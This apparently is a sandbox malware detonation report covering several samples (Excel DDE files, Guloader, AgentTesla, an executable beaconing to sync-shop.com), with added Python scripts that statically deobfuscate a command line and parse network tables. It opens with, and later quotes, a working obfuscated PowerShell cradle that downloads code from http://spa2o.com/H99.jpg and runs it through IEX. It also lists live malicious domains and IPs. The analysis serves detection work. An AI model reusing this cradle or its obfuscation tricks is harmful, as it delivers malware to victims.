powershell $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|IEX;do {$ping = test-connection -comp google.com -count 1 -Quiet} until($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|I`E`X;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing', [Microsoft.VisualBasic.CallType]::Method,'http' + '://spa2o.com/H99.jpg')|I`E`X
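The powershell.exe command line above hides its second stage behind three cheap tricks: string concatenation ('Down' + 'load' + 'Str' + 'ing'), backtick-split bare words (I`E`X), and a reflective call through [Microsoft.VisualBasic.Interaction]::CallByName so that DownloadString never appears as a method call. It also forces TLS 1.2 (SecurityProtocolType 3072) and spins in a do/until on test-connection until google.com answers, which is why the Network table shows google.com resolved before spa2o.com was contacted, and why the download never happens in an offline sandbox. The script below is an added example, not part of the report: it tokenises the command line copied verbatim from above, undoes the concatenation and backticks statically (nothing is executed), and pulls out the strings fed to IEX, the CallByName target and the URL.

```python
"""Static unpicking of the PowerShell command line recorded in behavioral24.
Added example, not part of the report; the only input is the command line
printed above, copied verbatim into CMDLINE."""
import re

CMDLINE = (
    "powershell $ErrorActionPreference = 'SilentlyContinue';"
    "$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);"
    "[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;"
    "'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + "
    "'thPartialName(''Microsoft.VisualBasic'')'|IEX;"
    "do {$ping = test-connection -comp google.com -count 1 -Quiet} until($ping);"
    "$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|I`E`X;"
    "$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing', "
    "[Microsoft.VisualBasic.CallType]::Method,'http' + '://spa2o.com/H99.jpg')|I`E`X"
)

TLS_NAMES = {48: "Ssl3", 192: "Tls", 768: "Tls11", 3072: "Tls12", 12288: "Tls13"}


def ps_tokens(ps):
    """Split into ('str', text) for single-quoted literals (with '' unescaped)
    and ('raw', text) for everything else. Double-quoted strings would need
    their own handling; this command line has none."""
    tokens, i, n = [], 0, len(ps)
    while i < n:
        if ps[i] != "'":
            j = ps.find("'", i)
            j = n if j < 0 else j
            tokens.append(("raw", ps[i:j]))
            i = j
            continue
        buf, j = [], i + 1
        while j < n:
            if ps[j] == "'" and ps[j + 1:j + 2] == "'":
                buf.append("'")          # '' inside a literal is one quote
                j += 2
            elif ps[j] == "'":
                break
            else:
                buf.append(ps[j])
                j += 1
        tokens.append(("str", "".join(buf)))
        i = j + 1
    return tokens


def strip_backticks(tokens):
    """Remove backtick escapes used to split bare words (I`E`X -> IEX).
    Only code outside literals is touched; a backtick inside '...' is literal."""
    return [(k, re.sub(r"`(.)", r"\1", v) if k == "raw" else v) for k, v in tokens]


def fold_concat(tokens):
    """Merge 'a' + 'b' chains into a single literal."""
    out = []
    for tok in tokens:
        if (tok[0] == "str" and len(out) >= 2 and out[-1][0] == "raw"
                and out[-1][1].strip() == "+" and out[-2][0] == "str"):
            out.pop()
            out[-1] = ("str", out[-1][1] + tok[1])
        else:
            out.append(tok)
    return out


def render(tokens):
    return "".join(v if k == "raw" else "'" + v.replace("'", "''") + "'" for k, v in tokens)


def deobfuscate(cmdline):
    return render(fold_concat(strip_backticks(ps_tokens(cmdline))))


def summarize(cmdline):
    tokens = fold_concat(strip_backticks(ps_tokens(cmdline)))
    clean = render(tokens)
    # A literal whose next code token starts with |IEX is executed as script.
    iex_strings = [v for (k, v), nxt in zip(tokens, tokens[1:])
                   if k == "str" and nxt[0] == "raw" and nxt[1].lstrip().lower().startswith("|iex")]
    calls = re.findall(
        r"CallByName\(\$(\w+)\s*,\s*'([^']*)'\s*,\s*\[Microsoft\.VisualBasic\.CallType\]::(\w+)\s*,\s*'([^']*)'\s*\)",
        clean, re.I)
    proto = re.search(r"SecurityProtocolType\]\s*,\s*(\d+)", clean)
    return {
        "deobfuscated": clean,
        "iex_strings": iex_strings,
        "callbyname": calls,
        "urls": re.findall(r"https?://[^\s'\")]+", clean),
        "tls": TLS_NAMES.get(int(proto.group(1))) if proto else None,
        "waits_for_network": bool(re.search(r"do\s*\{.*?test-connection.*?\}\s*until\(\$\w+\)", clean, re.I | re.S)),
    }


if __name__ == "__main__":
    print(summarize(CMDLINE)["deobfuscated"])
```

The folded form reads: load Microsoft.VisualBasic, wait for connectivity, build a Net.WebClient, call its DownloadString on http://spa2o.com/H99.jpg and pipe the result to IEX. The .jpg extension is cosmetic; whatever 185.58.73.32 served was PowerShell. The WebClient/IEX pair, the CallByName reflection and the `SecurityProtocol = 3072` assignment are each usable as a command-line detection on their own, and none of them survive naive concatenation only if the detection runs on the folded string, which is the point of doing the folding before matching.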

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 spa2o.com udp
HR 185.58.73.32:80 spa2o.com tcp

Files

memory/2436-0-0x000007FEF5EE3000-0x000007FEF5EE4000-memory.dmp

memory/2436-1-0x0000000001220000-0x0000000001228000-memory.dmp

memory/2704-6-0x000007FEF61EE000-0x000007FEF61EF000-memory.dmp

memory/2704-8-0x000000001B810000-0x000000001BAF2000-memory.dmp

memory/2704-7-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

memory/2704-9-0x0000000001E10000-0x0000000001E18000-memory.dmp

memory/2704-10-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

memory/2704-11-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

memory/2704-12-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

memory/2704-13-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

memory/2704-14-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

memory/2704-15-0x000007FEF61EE000-0x000007FEF61EF000-memory.dmp

memory/2704-16-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240903-en

Max time kernel

118s

Max time network

126s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\I055170_06975755.xls

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\I055170_06975755.xls

Network

N/A

Files

memory/2648-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2648-1-0x000000007278D000-0x0000000072798000-memory.dmp

memory/2648-2-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-13-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-15-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-14-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-12-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-11-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-10-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-9-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-7-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-6-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-5-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-4-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-3-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-8-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-16-0x000000007278D000-0x0000000072798000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240903-en

Max time kernel

122s

Max time network

126s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\I795405_33242211.xls

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\I795405_33242211.xls

Network

N/A

Files

memory/2716-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2716-1-0x00000000727CD000-0x00000000727D8000-memory.dmp

memory/2716-16-0x00000000727CD000-0x00000000727D8000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240729-en

Max time kernel

16s

Max time network

17s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe"

Signatures

Guloader family

guloader

Guloader,Cloudeye

downloader guloader

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe

"C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe"

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\nsuF539.tmp\Math.dll

MD5 85428cf1f140e5023f4c9d179b704702
SHA1 1b51213ddbaedfffb7e7f098f172f1d4e5c9efba
SHA256 8d9a23dd2004b68c0d2e64e6c6ad330d0c648bffe2b9f619a1e9760ef978207a
SHA512 dfe7f9f3030485caf30ec631424120030c3985df778993342a371bf1724fa84aa885b4e466c6f6b356d99cc24e564b9c702c7bcdd33052172e0794c2fdecce59

\Users\Admin\AppData\Local\Temp\nsuF539.tmp\System.dll

MD5 cff85c549d536f651d4fb8387f1976f2
SHA1 d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e
SHA256 8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8
SHA512 531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88

memory/1824-17-0x00000000042A0000-0x00000000043A0000-memory.dmp

memory/1824-18-0x00000000042A0000-0x00000000043A0000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240903-en

Max time kernel

144s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe

"C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 sync-shop.com udp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
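The Network tables of behavioral29 (the Xloader run) and behavioral26 (the PO_#YBIC... sample) are both noisy in their own way. The first mixes reverse lookups of Microsoft and Google address space, which Windows itself makes, with a dozen domains the injected explorer.exe resolved, only some of which it then connected to; Xloader, like Formbook before it, carries decoy domains alongside its real server, so contacted or not, none of these names is attribution by itself. The second is sixty identical rows to one host. The parser below is an added example, not part of the report: it reads rows copied from the two tables (a subset of behavioral29, the first four rows of behavioral26), drops the PTR lookups and the report's own domain-less row, and separates names that got a TCP connection from names that were only resolved.

```python
"""Turn the report's Network tables into a short list of hosts that were
actually contacted. Added example for the behavioral29 and behavioral26
tables; it is not part of the report and only parses rows copied from it."""
import re

ROW_RE = re.compile(r"^([A-Z]{2})\s+(\S+):(\d+)\s+(?:(\S+)\s+)?(tcp|udp)$")

# Subset of the behavioral29 rows (Xloader run on win10); the last row is the
# report's own domain-less entry.
XLOADER_ROWS = """
Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 www.knowunknow.com udp
US 104.18.217.221:80 www.knowunknow.com tcp
US 8.8.8.8:53 221.217.18.104.in-addr.arpa udp
US 8.8.8.8:53 www.sarrosh.com udp
US 8.8.8.8:53 www.apollorealtors.com udp
NL 212.32.237.92:80 www.apollorealtors.com tcp
US 8.8.8.8:53 www.suddennnnnnnnnnnn02.xyz udp
US 8.8.8.8:53 www.dazalogistics.com udp
US 76.223.105.230:80 www.dazalogistics.com tcp
US 8.8.8.8:53 udp
"""

# First four rows of the behavioral26 table (the remaining rows repeat the tcp one).
SYNC_SHOP_ROWS = """
US 8.8.8.8:53 sync-shop.com udp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
"""


def parse_rows(text):
    """One dict per row; the header line is skipped, anything else unparsable is an error."""
    rows = []
    for line in text.strip().splitlines():
        if line.startswith("Country "):
            continue
        m = ROW_RE.match(line)
        if not m:
            raise ValueError(f"unexpected row: {line!r}")
        country, ip, port, domain, proto = m.groups()
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def summarize(rows):
    """Separate names that got a connection from names that were only resolved."""
    contacted, queried = {}, []
    ptr = unnamed = 0
    for r in rows:
        if r["domain"] is None:
            unnamed += 1
        elif r["domain"].endswith(".in-addr.arpa"):
            ptr += 1                      # reverse lookups: Windows housekeeping, not IOCs
        elif r["proto"] == "tcp":
            key = (r["domain"], r["ip"], r["port"])
            contacted[key] = contacted.get(key, 0) + 1
        elif r["proto"] == "udp" and r["port"] == 53:
            queried.append(r["domain"])
    contacted_names = {d for d, _, _ in contacted}
    dns_only = sorted({d for d in queried if d not in contacted_names})
    return {"contacted": contacted, "dns_only": dns_only,
            "ptr_lookups": ptr, "unnamed_rows": unnamed}


def ioc_lines(summary):
    """One line per contacted host, suitable for a blocklist or a hunt query."""
    return [f"{d} {ip}:{port} connections={n}"
            for (d, ip, port), n in sorted(summary["contacted"].items())]


if __name__ == "__main__":
    for name, rows in (("behavioral29", XLOADER_ROWS), ("behavioral26", SYNC_SHOP_ROWS)):
        s = summarize(parse_rows(rows))
        print(name, "contacted:", *ioc_lines(s), sep="\n  ")
        print("  dns-only:", s["dns_only"], "ptr:", s["ptr_lookups"], "unnamed:", s["unnamed_rows"])
```

For the behavioral26 rows the sixty connections collapse to a single line for sync-shop.com 74.220.219.225:443. For the Xloader rows the contacted/dns-only split is a triage aid only: treat the whole list as candidates to hunt for in proxy and DNS logs, and expect the real server to be one of many.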

Files

memory/1940-0-0x00000000001B0000-0x00000000001B1000-memory.dmp

memory/1940-2-0x0000000000406000-0x0000000000407000-memory.dmp

memory/1940-3-0x0000000000400000-0x00000000004AD000-memory.dmp

memory/1940-4-0x00000000001B0000-0x00000000001B1000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

148s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\680589798891.xls"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\680589798891.xls"

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 25.77.123.92.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 d6a8751247b907a05fe4c5e591a7329e
SHA1 e04fa6f11939152ac76fc1f5e593ce5dae258319
SHA256 1b3914a8e1640456acd4463618ecec0fa7ae9ddeae317220fa766be5f2974082
SHA512 9ba04fa5148d0bcde255d723a2b9c0533b0c2bd996fe8d5221dfed146f90fac0e895395689530a935f31878b0f70b825cd0fab1ce0211aaeeaaae23844ecf51c

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

127s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4992 set thread context of 4440 N/A C:\Users\Admin\AppData\Local\Temp\EZ0496.exe C:\Users\Admin\AppData\Local\Temp\EZ0496.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\EZ0496.exe

"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"

C:\Users\Admin\AppData\Local\Temp\EZ0496.exe

"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 17.77.123.92.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 105.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 25.77.123.92.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EZ0496.exe.log

MD5 e50d61d6d5cec0d2c6b3fbf02b17af2d
SHA1 fcf43f96e7389c27ee201fb00b65db01ca2cee40
SHA256 a87cf2dbf70a59d3d347f9ca743b6ceb3c805b4714cf4fb963c18b9ca8ffd0a9
SHA512 0348b60095cd48d275a5234fe34c1fd7a7c9921e1d92dafea0379d607f898eb1c2e089dafa1db608fad65497fc8f90fa699109b06a5f2c12c0bc8c9192ff9924

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20241010-en

Max time kernel

122s

Max time network

123s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\680589798891.xls

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\680589798891.xls

Network

N/A

Files

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240903-en

Max time kernel

117s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 220

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

154s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\I795405_33242211.xls"

Signatures

Checks processor information in registry

Description Indicator Process Target
